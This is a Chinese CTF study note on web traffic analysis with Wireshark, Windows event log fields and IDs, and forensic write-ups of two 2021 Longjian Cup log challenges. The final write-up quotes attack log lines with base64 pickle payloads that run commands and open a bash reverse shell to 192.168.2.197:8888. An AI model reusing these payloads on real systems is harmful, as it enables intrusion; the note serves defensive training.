web流量分析、windows日志分析

A.web流量分析的基本思路

比赛中的流量分析可以概括为以下三个方向:

1.流量包修复

2.协议分析

3.数据提取

流量分析传输了数据：zip rar png jpg txt mp3，特别是流量包比较大时需要注意

binwalk分离文件，grep或者wireshark内ctrl+f搜索

分情况使用导出对象，导出分组字节流，原始数据

搜索时可以看情况搜索分组详情、分组字节流

查看包间的差异，可以按大小排列数据包等

png在流量中经常以base64形式出现

如果有TLS，要么找密钥，要么看别的协议
 

1.简单的wireshark的使用

Wireshark 基本语法，基本使用方法，及包过虑规则_wireshark语法_竹痕的博客-CSDN博客

 根据题目所给的提示管理员登陆了网站

我们可以利用login这个方面入手查找管理员的账号信息

直接查找login

 

查找到之后进去找我们需要的账号密码即可 

2.文件上传类型

一般文件类型可以先查找http中的upload方式进行处理如下图

与上一个类型大同小异

只需要查找http协议寻找上传类型即可

 3.大流量分析

将文件下载下来利用wireshark的统计功能 

 就能看出来ip地址访问最多的是哪一个

B.日志分析

日志简介：Windows系统默认以二进制XML Windows事件日志记录格式（由.evtx扩展名指定）将日志存储在％SystemRoot％\System32\Winevt\logs目录中。日志也可以使用日志订阅远程存储。对于远程日志记录，运行Windows Event Collector服务的远程系统订阅其他系统生成的日志。

什么是日志，有哪些日志

Windows日志特指Windows操作系统中各种各样的日志文件。

安全日志:记录系统的安全审计事件，包含各种类型的登录日志、对象访问日志、进程追踪日志、特权使用、帐号管理、策略变更、系统事件。安全日志也是调查取证中最常用到的日志。
默认位置：%SystemRoot%\System32\Winevt\Logs\Security.evtx

系统日志:记录操作系统组件产生的事件，主要包括驱动程序、系统组件和应用软件的崩溃以及数据丢失错误等
默认位置：%SystemRoot%\System32\Winevt\Logs\System.evtx

应用程序日志:包含由应用程序或系统程序记录的事件，主要记录程序运行方面的事件，例如数据库程序可以在应用程序日志中记录文件错误，程序开发人员可以自行决定监视哪些事件。
默认位置：%SystemRoot%\System32\Winevt\Logs\Application.evtx

默认设置下，安全性日志是关闭的，管理员可以使用组策略来启动安全性日志，或者在注册表中设置审核策略，以便当安全性日志满后使系统停止响应。

常见的日志分析方法有两种

1.特征字符分析：

就是根据攻击者利用的漏洞特征，进行判断攻击者使用的是哪一种攻击。

常见的类型有以下：SQL注入、XSS跨站脚本攻击、恶意文件上传、一句话木马连接等。

2.访问频率分析：就是查看访问频率来分析黑客的行为信息。

常见的类型有有以下：SQL盲注、敏感目录爆破、账号爆破、Web扫描。

事件ID字段

• Log Name：存储事件的事件日志的名称，在处理从同一系统提取的大量日志时很有用。
• Source：生成事件的服务，Microsoft组件或应用程序。
• Event ID：分配给每种已审计活动类型的代码。
• Level：分配给相关事件的严重性。
• User：在记录事件时，触发活动或源正在运行的用户上下文的用户帐户。注意，该字段通常表示“系统”而不是记录事件原因的用户
• OpCode：由生成日志的源分配
• Logged：记录事件的本地系统日期和时间
• Task Category：由生成日志的源分配
• keywords：用于对事件进行分组或排序。
• Computer：记录事件的计算机。当检查从多个系统收集的日志时，此功能很有用，但不应被视为导致事件的设备
• Description：一个文本块，其中记录了特定于所记录事件的其他信息，对于取证人员来说，这通常是最重要的字段。
• 以下是常见的ID

• 事件ID	说明
  1102	审核日志已清除
  1104	安全日志现已满
  4608	Windows正在启动
  4609	Windows正在关闭
  4616	系统时间已更改。
  4625	帐户无法登录
  4624	帐户已成功登录
  4634	帐户已注销
  4647	用户启动的注销
  4672	使用超级用户（如管理员）进行登录
  4720	创建用户
  4657	注册表值已修改
  4741	已创建计算机帐户
  4742	计算机帐户已更改
  4743	计算机帐户已删除

[2021首届“陇剑杯”网络安全大赛] 日志分析

题目描述
单位某应用程序被攻击，请分析日志，进行作答：

1.网络存在源码泄漏，源码文件名是__www.zip___。(请提交带有文件后缀的文件名，例如x.txt)
2.分析攻击流量，黑客往/tmp目录写入一个文件，文件名为___sess_car____。
3.分析攻击流量，黑客使用的是__SplFileObject__类读取了秘密文件。

第一问：

这题先利用查找工具查找log状态码为200的

以下就是查找到的为200的状态码

λ cat access.log |grep " 200 "
172.17.0.1 - - [07/Aug/2021:01:37:51 +0000] "GET / HTTP/1.1" 200 638 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
172.17.0.1 - - [07/Aug/2021:01:37:55 +0000] "GET / HTTP/1.1" 200 637 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
172.17.0.1 - - [07/Aug/2021:01:37:58 +0000] "GET /index.php HTTP/1.1" 200 601 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
172.17.0.1 - - [07/Aug/2021:01:37:59 +0000] "GET /index%2ephp HTTP/1.1" 200 601 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
172.17.0.1 - - [07/Aug/2021:01:37:59 +0000] "GET /www%2ezip HTTP/1.1" 200 1686 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
172.17.0.1 - - [07/Aug/2021:01:37:59 +0000] "GET /www%2ezip HTTP/1.1" 200 1686 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
172.17.0.1 - - [07/Aug/2021:01:37:59 +0000] "GET /info%2ephp HTTP/1.1" 200 25770 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
172.17.0.1 - - [07/Aug/2021:01:38:20 +0000] "GET /?file=sess_car HTTP/1.1" 200 687 "-" "python-requests/2.26.0"
172.17.0.1 - - [07/Aug/2021:01:38:20 +0000] "GET / HTTP/1.1" 200 645 "-" "python-requests/2.26.0"
172.17.0.1 - - [07/Aug/2021:01:38:21 +0000] "GET /?file=sess_car HTTP/1.1" 200 680 "-" "python-requests/2.26.0"
172.17.0.1 - - [07/Aug/2021:01:38:21 +0000] "GET / HTTP/1.1" 200 672 "-" "python-requests/2.26.0"

说明备份文件为www.zip
 以上观察就可以的得到第一题的答案www.zip

第二问：

这一题很简单根据题目提示黑客在/tmp里写入文件

我们直接查找/tmp即可

第三问：

在文件这里存在反序列

将其还原就能得到flag

func|N;files|a:2:{s:8:"filename";s:16:"./files/filename";s:20:"call_user_func_array";s:28:"./files/call_user_func_array";}paths|a:1:{s:5:"/flag";s:13:"SplFileObject";}

func：
Array
(
    [filename] => ./files/filename
    [call_user_func_array] => ./files/call_user_func_array
)

paths
Array
(
    [/flag] => SplFileObject
)

[2021首届“陇剑杯”网络安全大赛] 简单日志分析

题目描述
某应用程序被攻击，请分析日志后作答：

1.黑客攻击的参数是__user__。（如有字母请全部使用小写）
2.黑客查看的秘密文件的绝对路径是___/Th4s_IS_VERY_Import_Fi1e___。
3.黑客反弹shell的ip和端口是____192.168.2.197:8888____。

第一问：

打开文件

大体查看一下发现有不是404后缀的

查找404将其全部删除留下不是404的

127.0.0.1 - - [07/Aug/2021 10:43:12] "GET /?user=STAKcDAKMFMnd2hvYW1pJwpwMQowKGcwCmxwMgowKEkwCnRwMwowKGczCkkwCmRwNAowY29zCnN5c3RlbQpwNQowZzUKKGcxCnRSLg== HTTP/1.1" 500 -
# 'whoami'

127.0.0.1 - - [07/Aug/2021 10:43:12] "GET /?user=STAKcDAKMFMnY2F0IC9UaDRzX0lTX1ZFUllfSW1wb3J0X0ZpMWUnCnAxCjAoZzAKbHAyCjAoSTAKdHAzCjAoZzMKSTAKZHA0CjBjb3MKc3lzdGVtCnA1CjBnNQooZzEKdFIu HTTP/1.1" 500 -
# 'cat /Th4s_IS_VERY_Import_Fi1e'

127.0.0.1 - - [07/Aug/2021 10:43:12] "GET /?user=STAKcDAKMFMnYmFzaCAtaSA%2bJiAvZGV2L3RjcC8xOTIuMTY4LjIuMTk3Lzg4ODggMD4mMScKcDEKMChnMApscDIKMChJMAp0cDMKMChnMwpJMApkcDQKMGNvcwpzeXN0ZW0KcDUKMGc1CihnMQp0Ui4= HTTP/1.1" 500 -
# 'bash -i >& /dev/tcp/192.168.2.197/8888 0>&1'
即以上三个

说明异常的是user

第二问：

根据以上进行base64解码得到

解到第二个就得到答案 

 第三问：

解出第三个即可